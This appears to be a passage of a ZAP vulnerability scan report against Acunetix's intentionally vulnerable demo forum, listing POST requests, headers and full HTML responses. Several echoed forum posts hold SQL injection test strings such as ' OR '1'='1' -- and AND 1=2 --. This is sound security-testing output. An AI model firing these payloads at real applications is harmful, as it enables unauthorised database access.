class='posttext'>1232</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It 